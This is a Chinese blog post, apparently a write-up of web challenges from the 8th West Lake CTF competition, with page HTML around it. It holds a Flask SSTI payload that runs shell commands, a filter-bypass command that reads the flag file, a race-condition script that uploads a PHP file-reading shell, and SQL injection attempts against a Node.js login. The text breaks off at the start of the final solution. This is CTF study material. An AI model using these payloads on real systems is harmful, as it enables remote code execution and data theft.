
<!DOCTYPE html>
<html lang="zh-CN">

<head>
  <meta charset="UTF-8" />
  <title>第八届西湖论剑 | 雲流のLowest World</title>
  <meta name="author" content="C1oudfL0w0" />
  <meta name="description" content="" />
  <meta name="keywords" content="" />
  <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
  <link rel="icon" href="/blog/images/croppedImage_cropped.jpg" />
  <!-- cdn挂掉的时候要可以引用本地 -->
<!-- <script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.min.js"></script> -->
<script src="/blog/js/vue.global.prod.min.js"></script>


<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.2.1/css/all.min.css" />


<link rel="stylesheet" href="/blog/css/all.min.css" />
<link rel="stylesheet" href="/blog/css/fonts.min.css" />
<link rel="stylesheet" href="/blog/css/search.css" />
<script> const mixins = {}; </script>


<!--改成了prismjs高亮-->

<script src="/blog/js/lib/prism.js"></script>
<link rel="stylesheet" href="/blog/css/prism.css" rel="stylesheet" />



<script src="/blog/js/lib/preview.js"></script>










<script src="/blog/js/lib/home.js"></script>

<link rel="stylesheet" href="/blog/css/main.css" />
<!-- 引入不蒜子-->

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script type="text/javascript" src="/blog/js/lib/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/blog/js/lib/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<!-- 引入clipboard -->

<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>

<script type="text/javascript" src="/blog/js/lib/codeBlock/codeCopy.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/blog/js/lib/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/blog/atom.xml" title="雲流のLowest World" type="application/atom+xml">
</head>

<body>
  <!--flag{never_g0nna g1ve_you up}-->

  <!-- 页面点击特效 -->
  <script type="text/javascript" src="/blog/js/love-click.js"></script>

  <!-- 浏览器标题 -->
  <script async type="text/javascript" src="/blog/js/FunnyTitle.js"></script>

  <!-- 动态背景 -->
  

  <!--文章目录-->
  
    <div id="toc" class="toc-article">
    <h3><i class="fas fa-stream"></i>  目录</h3>
      <div class="toc-title"></div>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rank-l"><span class="toc-number">2.</span> <span class="toc-text">Rank-l</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rank-U%EF%BC%88Unsolved%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">Rank-U（Unsolved）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli-or-not%EF%BC%88%E5%A4%8D%E7%8E%B0%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">sqli or not（复现）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E8%A7%A3"><span class="toc-number">4.1.</span> <span class="toc-text">正解</span></a></li></ol></li></ol>
    </div>
    <script>
    (function () {
        function initTocHighlight() {
            var tocLinks = document.querySelectorAll('#toc .toc-link');
            if (!tocLinks.length) return;

            // 收集所有标题锚点对应的 DOM 元素
            var headings = [];
            tocLinks.forEach(function (link) {
                var href = link.getAttribute('href');
                if (!href) return;
                var id = decodeURIComponent(href.slice(1));
                var el = document.getElementById(id);
                if (el) headings.push({ el: el, link: link });
            });
            if (!headings.length) return;

            var activeLink = null;
            var offset = 80;

            function highlight() {
                var scrollTop = window.pageYOffset || document.documentElement.scrollTop;
                var current = null;

                for (var i = 0; i < headings.length; i++) {
                    if (headings[i].el.getBoundingClientRect().top <= offset + 10) {
                        current = headings[i];
                    }
                }

                // 仅在用户确实滚动过、且到达页面底部时，才强制高亮最后一个
                if (scrollTop > 100 && window.innerHeight + scrollTop >= document.documentElement.scrollHeight - 50) {
                    current = headings[headings.length - 1];
                }

                // 页面顶部且没有标题进入视口时，高亮第一个
                if (scrollTop == 0) {
                    current = headings[0];
                }

                if (current && current.link !== activeLink) {
                    // 清除所有高亮
                    tocLinks.forEach(function (link) {
                        link.classList.remove('toc-active');
                    });

                    // 高亮当前项
                    current.link.classList.add('toc-active');
                    activeLink = current.link;

                    // TOC 容器自动滚动，使当前项可见
                    var tocEl = document.getElementById('toc');
                    var linkRect = activeLink.getBoundingClientRect();
                    var tocRect = tocEl.getBoundingClientRect();
                    if (linkRect.top < tocRect.top || linkRect.bottom > tocRect.bottom) {
                        activeLink.scrollIntoView({ block: 'center', behavior: 'smooth' });
                    }
                } else if (!current && activeLink) {
                    tocLinks.forEach(function (link) {
                        link.classList.remove('toc-active');
                    });
                    activeLink = null;
                }
            }

            var ticking = false;
            window.addEventListener('scroll', function () {
                if (!ticking) {
                    requestAnimationFrame(function () {
                        highlight();
                        ticking = false;
                    });
                    ticking = true;
                }
            });

            // 初始高亮
            highlight();
        }

        // 等待页面完全加载后再初始化（确保文章标题 DOM 已渲染）
        if (document.readyState === 'complete') {
            initTocHighlight();
        } else {
            window.addEventListener('load', initTocHighlight);
        }
    })();
    </script>
  

  <!--返回顶部-->
  <div id="totop" style="position:fixed;bottom:50px;right:60px;font-size: 48px;cursor: pointer;z-index: 10;">
    <a title="返回顶部">↑</a>
  </div>
  <script src="/blog/js/totop.js"></script>

  <div id="layout">
    
    <div id="content-background" ref="contentBackground" data-images="https://pic.imgdb.cn/item/65d61d809f345e8d03b8bc7a.png"></div>
    
    <transition name="fade">
      <div id="loading" v-show="loading">
        <div id="loading-circle">
          <h2>LOADING</h2>
          <p>第一次加载文章图片可能会花费较长时间</p>
          <p>要不挂个梯子试试？（x</p>
          <p>加载过慢请开启缓存&ensp;浏览器默认开启</p>
          <img src="/blog/images/loading.gif" />
        </div>
      </div>
    </transition>
    <transition name="into">
      <div id="main" v-show="!loading">
        <nav id="menu" ref="menu">
    <div class="desktop-menu">
        <a class="title" href="/blog/">
            <span>雲流のLOWEST WORLD</span>
        </a>
        
        <a href="/blog/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/blog/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/blog/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/blog/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/blog/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a href="/blog/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;Links</span>
        </a>
        
        <a href="/blog/search">
            <i class="fa-solid fa-search fa-fw"></i>
            <span>&ensp;Search</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" v-show="showMenu" @click="showMenu = !showMenu"></div>
        <div class="title" @click="showMenu = !showMenu">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;雲流のLOWEST WORLD</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="showMenu">
            
            <a href="/blog/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                </div>
            </a>
            
            <a href="/blog/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                </div>
            </a>
            
            <a href="/blog/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                </div>
            </a>
            
            <a href="/blog/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                </div>
            </a>
            
            <a href="/blog/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                </div>
            </a>
            
            <a href="/blog/links">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-link fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Links</div>
                </div>
            </a>
            
            <a href="/blog/search">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-search fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Search</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

        <div class="article">
    <div>
        <h1>第八届西湖论剑</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2025/1/18
        </span>
        
        <span class="category">
            <a href="/blog/categories/CTF%E7%BA%BF%E4%B8%8A%E8%B5%9B/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                CTF线上赛
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            <span class="tag">
                
                <a href="/blog/tags/SSTI/" style="color: #ffa2c4">SSTI</a>
            </span>
            
            <span class="tag">
                
                <a href="/blog/tags/Nodejs/" style="color: #00bcd4">Nodejs</a>
            </span>
            
        </span>
        
        <!--文章字数统计-->
        
            
<div style="margin-top:10px;">
    <span class="post-time">
      <span class="post-meta-item-icon">
        <i class="fa fa-keyboard-o"></i>
        <span class="post-meta-item-text">  字数统计: </span>
        <!-- 安装插件npm install hexo-wordcount --save -->
        <span class="post-count">1.2k字</span>
      </span>
    </span>

    <span class="post-time">
      &nbsp; | &nbsp;
      <span class="post-meta-item-icon">
        <i class="fa fa-hourglass-half"></i>
        <span class="post-meta-item-text">  阅读时长: </span>
        <span class="post-count">6分</span>
      </span>
    </span>
    
    <!--不蒜子统计访问数-->
    <span id="busuanzi_container_page_pv">
    &nbsp; | &nbsp;
    总文章阅读量：<span id="busuanzi_value_page_pv"></span>次
    </span>
</div>

          
    </div>
    
    <div class="content" v-pre>
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>所以 已经没事了😄</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/uuzeray/article/details/145228235">https://blog.csdn.net/uuzeray/article/details/145228235</a></p>
<span id="more"></span>

<p><img src="/blog/2025/01/18/%E7%AC%AC%E5%85%AB%E5%B1%8A%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/image-20250118174518066.png" alt="image-20250118174518066"></p>
<hr>
<h1 id="Rank-l"><a href="#Rank-l" class="headerlink" title="Rank-l"></a>Rank-l</h1><p>输入一些其他字符，然后输入密码会报错弹出flask debug界面</p>
<p>泄露 app.py</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">if</span> is_safe_input<span class="token punctuation">(</span>phone<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> redirect<span class="token punctuation">(</span>url_for<span class="token punctuation">(</span><span class="token string">'index'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">if</span> phone <span class="token operator">!=</span> <span class="token string">"1686682318"</span> <span class="token keyword">and</span> password <span class="token operator">!=</span> <span class="token string">"Happy_news_admin"</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> render_template_string<span class="token punctuation">(</span>'<span class="token operator">&lt;</span>!DOCTYPE html<span class="token operator">></span>\
    <span class="token operator">&lt;</span>html lang<span class="token operator">=</span><span class="token string">"en"</span><span class="token operator">></span>\
    <span class="token operator">&lt;</span>head<span class="token operator">></span>\
        <span class="token operator">&lt;</span>meta charset<span class="token operator">=</span><span class="token string">"UTF-8"</span><span class="token operator">></span>\
        <span class="token operator">&lt;</span>title<span class="token operator">></span>login failed<span class="token operator">&lt;</span><span class="token operator">/</span>title<span class="token operator">></span>\
    <span class="token operator">&lt;</span><span class="token operator">/</span>head<span class="token operator">></span>\<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到账密<code>1686682318:Happy_news_admin</code></p>
<p>但是输入正确后依旧重定向回 &#x2F;</p>
<p>猜测是在 render_template_string 打 ssti，在&#x2F;login处填payload，在&#x2F;cpass处获取回显</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">&#123;</span><span class="token punctuation">&#123;</span>lipsum.__globals__.os.popen<span class="token punctuation">(</span><span class="token string">'ls ..'</span><span class="token punctuation">)</span>.read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>flag在 &#x2F;flagf149</p>
<p>app.py</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> flask <span class="token keyword">import</span> Flask<span class="token punctuation">,</span> request<span class="token punctuation">,</span> render_template<span class="token punctuation">,</span> render_template_string<span class="token punctuation">,</span> redirect<span class="token punctuation">,</span> url_for<span class="token punctuation">,</span> abort
<span class="token keyword">from</span> urllib<span class="token punctuation">.</span>parse <span class="token keyword">import</span> unquote

app <span class="token operator">=</span> Flask<span class="token punctuation">(</span>__name__<span class="token punctuation">)</span>

phone <span class="token operator">=</span> <span class="token string">''</span>

<span class="token keyword">def</span> <span class="token function">is_safe_input</span><span class="token punctuation">(</span>user_input<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment"># unsafe_keywords = ['eval', 'exec', 'os', 'system', 'import', '__import__']</span>
    unsafe_keywords <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'flag'</span><span class="token punctuation">,</span><span class="token string">'?'</span><span class="token punctuation">,</span><span class="token string">'*'</span><span class="token punctuation">,</span><span class="token string">'-'</span><span class="token punctuation">,</span><span class="token string">'less'</span><span class="token punctuation">,</span><span class="token string">'nl'</span><span class="token punctuation">,</span><span class="token string">'tac'</span><span class="token punctuation">,</span><span class="token string">'more'</span><span class="token punctuation">,</span><span class="token string">'tail'</span><span class="token punctuation">,</span><span class="token string">'od'</span><span class="token punctuation">,</span><span class="token string">'grep'</span><span class="token punctuation">,</span><span class="token string">'awd'</span><span class="token punctuation">,</span><span class="token string">'sed'</span><span class="token punctuation">,</span><span class="token string">'64'</span><span class="token punctuation">,</span><span class="token string">'/'</span><span class="token punctuation">,</span><span class="token string">'%2f'</span><span class="token punctuation">,</span><span class="token string">'%2F'</span><span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>构造rce：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">cd</span> <span class="token punctuation">..</span>%26%26head f<span class="token punctuation">\</span>lagf149<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2025/01/18/%E7%AC%AC%E5%85%AB%E5%B1%8A%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/image-20250118105248402.png" alt="image-20250118105248402"></p>
<hr>
<h1 id="Rank-U（Unsolved）"><a href="#Rank-U（Unsolved）" class="headerlink" title="Rank-U（Unsolved）"></a>Rank-U（Unsolved）</h1><p>进去一个登录框，弱密码爆破失败，sql注入无果</p>
<p>PHP&#x2F;7.3.28 Apache&#x2F;2.4.38 (Debian)</p>
<p>换了几个字典，最终爆出 year2000</p>
<p>里面一个文件上传，啥都能传，但是访问 Uploads 里的文件路径只有 jpg 后缀的能读到，猜测其他后缀是被删了</p>
<p>尝试条件竞争，py脚本+burp把我c盘缓存淦爆了都没竞争成功</p>
<br>

<p>存个条件竞争的脚本吧</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
 
<span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
    burp0_url <span class="token operator">=</span> <span class="token string">"http://139.155.126.78:30675/admin/index.php"</span>  <span class="token comment"># 更新 URL</span>
    burp0_cookies <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token string">"PHPSESSID"</span><span class="token punctuation">:</span> <span class="token string">"bsgq3v7goubrk1ciepr0se2dfc"</span><span class="token punctuation">&#125;</span>  <span class="token comment"># 更新 PHP 会话 ID</span>
    
    burp0_data <span class="token operator">=</span> <span class="token punctuation">(</span>
        <span class="token string">"------WebKitFormBoundarygIbPTT5pJVbv72RS\r\n"</span>
        <span class="token string">"Content-Disposition: form-data; name=\"file_upload\"; filename=\"yjh3.php\"\r\n"</span>
        <span class="token string">"Content-Type: application/octet-stream\r\n\r\n"</span>
        <span class="token string">"&lt;?php echo file_get_contents('/flag');?>\r\n"</span>  <span class="token comment"># 改为新代码</span>
        <span class="token string">"------WebKitFormBoundarygIbPTT5pJVbv72RS--\r\n"</span>
    <span class="token punctuation">)</span>
    
    <span class="token comment"># 发送 POST 请求，只保留 Cookie</span>
    r <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>burp0_url<span class="token punctuation">,</span> cookies<span class="token operator">=</span>burp0_cookies<span class="token punctuation">,</span> data<span class="token operator">=</span>burp0_data<span class="token punctuation">)</span>
    
    <span class="token comment"># 提取文件名并保存到本地文件</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        filename <span class="token operator">=</span> r<span class="token punctuation">.</span>text<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'./Uploads/1f14bba00da3b75118bc8dbf8625f7d0/'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'&lt;/p>'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
        <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'name.txt'</span><span class="token punctuation">,</span> <span class="token string">'w'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> <span class="token builtin">file</span><span class="token punctuation">:</span>
            <span class="token builtin">file</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span>filename<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>  <span class="token comment"># 使用 strip() 去除可能的换行符</span>
    <span class="token keyword">except</span> IndexError<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"无法提取文件路径或文件上传失败"</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
 
url0 <span class="token operator">=</span> <span class="token string">'http://139.155.126.78:30675/admin/Uploads/1f14bba00da3b75118bc8dbf8625f7d0/'</span>
 
<span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
    <span class="token comment"># 直接读取文件内容，去除换行符并逐行处理</span>
    <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'name.txt'</span><span class="token punctuation">,</span> <span class="token string">'r'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> <span class="token builtin">file</span><span class="token punctuation">:</span>
        <span class="token keyword">for</span> filename <span class="token keyword">in</span> <span class="token builtin">file</span><span class="token punctuation">:</span>
            shellpath <span class="token operator">=</span> url0 <span class="token operator">+</span> filename<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span>  <span class="token comment"># 使用 strip() 去除换行符</span>
 
            <span class="token comment"># 发起 GET 请求</span>
            r1 <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>shellpath<span class="token punctuation">)</span>
 
            <span class="token comment"># 如果状态码不是 404，输出状态码和响应文本</span>
            <span class="token keyword">if</span> r1<span class="token punctuation">.</span>status_code <span class="token operator">!=</span> <span class="token number">404</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>r1<span class="token punctuation">.</span>status_code<span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>r1<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>第一个脚本多开点才行</p>
<p>合着就是线程少了竞争不来是吧</p>
<hr>
<h1 id="sqli-or-not（复现）"><a href="#sqli-or-not（复现）" class="headerlink" title="sqli or not（复现）"></a>sqli or not（复现）</h1><pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">var</span> express <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">'express'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> router <span class="token operator">=</span> express<span class="token punctuation">.</span><span class="token function">Router</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
module<span class="token punctuation">.</span>exports <span class="token operator">=</span> router<span class="token punctuation">;</span>

router<span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span><span class="token string">'/'</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token parameter">req<span class="token punctuation">,</span>res<span class="token punctuation">,</span>next</span><span class="token punctuation">)</span><span class="token operator">=></span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span>req<span class="token punctuation">.</span>query<span class="token punctuation">.</span>info<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span>req<span class="token punctuation">.</span>url<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">\,</span><span class="token regex-delimiter">/</span><span class="token regex-flags">ig</span></span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">'hacker1!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">var</span> info <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">.</span><span class="token function">parse</span><span class="token punctuation">(</span>req<span class="token punctuation">.</span>query<span class="token punctuation">.</span>info<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span>info<span class="token punctuation">.</span>username<span class="token operator">&amp;&amp;</span>info<span class="token punctuation">.</span>password<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            <span class="token keyword">var</span> username <span class="token operator">=</span> info<span class="token punctuation">.</span>username<span class="token punctuation">;</span>
            <span class="token keyword">var</span> password <span class="token operator">=</span> info<span class="token punctuation">.</span>password<span class="token punctuation">;</span>
            <span class="token keyword">if</span><span class="token punctuation">(</span>info<span class="token punctuation">.</span>username<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">\'|\"|\\</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">)</span> <span class="token operator">||</span> info<span class="token punctuation">.</span>password<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">\'|\"|\\</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
                res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">'hacker2!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token keyword">var</span> sql <span class="token operator">=</span> <span class="token string">"select * from userinfo where username = '&#123;username&#125;' and password = '&#123;password&#125;'"</span><span class="token punctuation">;</span>
            sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;username&#125;"</span><span class="token punctuation">,</span>username<span class="token punctuation">)</span><span class="token punctuation">;</span>
            sql <span class="token operator">=</span> sql<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"&#123;password&#125;"</span><span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span>
            connection<span class="token punctuation">.</span><span class="token function">query</span><span class="token punctuation">(</span>sql<span class="token punctuation">,</span><span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span>rs</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">'error1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">if</span><span class="token punctuation">(</span>rs<span class="token punctuation">.</span>length<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
                res<span class="token punctuation">.</span><span class="token function">sendFile</span><span class="token punctuation">(</span><span class="token string">'/flag'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span><span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">'username or password error'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token punctuation">&#125;</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">else</span><span class="token punctuation">&#123;</span>
            res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">"please input the data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
       
<span class="token punctuation">&#125;</span>
    <span class="token keyword">else</span><span class="token punctuation">&#123;</span>
        res<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token string">"please input the data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>只需要返回成功即可得到flag</p>
<p>我们传进去的参数是info，内容是json</p>
<p>首先是第一个waf，匹配<code>,</code>，只需要url编码即可绕过</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json"><span class="token punctuation">&#123;</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"1"</span>%2C<span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"1"</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后是第二个waf，匹配的是 info 里的<code>&#39;</code>，<code>&quot;</code>，<code>\\</code></p>
<p>要想注入的话肯定要一个<code>&#39;</code>或者<code>\</code>来转义，</p>
<p>期望的sql语句</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> userinfo <span class="token keyword">where</span> username <span class="token operator">=</span> <span class="token string">'1\' and password = '</span><span class="token punctuation">;</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token comment">#'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>或者</p>
<pre class="line-numbers language-sqlite" data-language="sqlite"><code class="language-sqlite">select * from userinfo where username &#x3D; &#39;1&#39;&#39; and password &#x3D; &#39;;select 1--&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>但是测了半天都转义不出想要的效果</p>
<br>

<h2 id="正解"><a href="#正解" class="headerlink" title="正解"></a>正解</h2><p>估计是要从 replace 入手，模板字符串替换的写法感觉有说法</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">var</span> sql <span class="token operator">=</span> <span class="token string">"select * from userinfo where username = '&#123;username&#125;' and password = '&#123;password&#125;'"</span><span class="token punctuation">;</span>
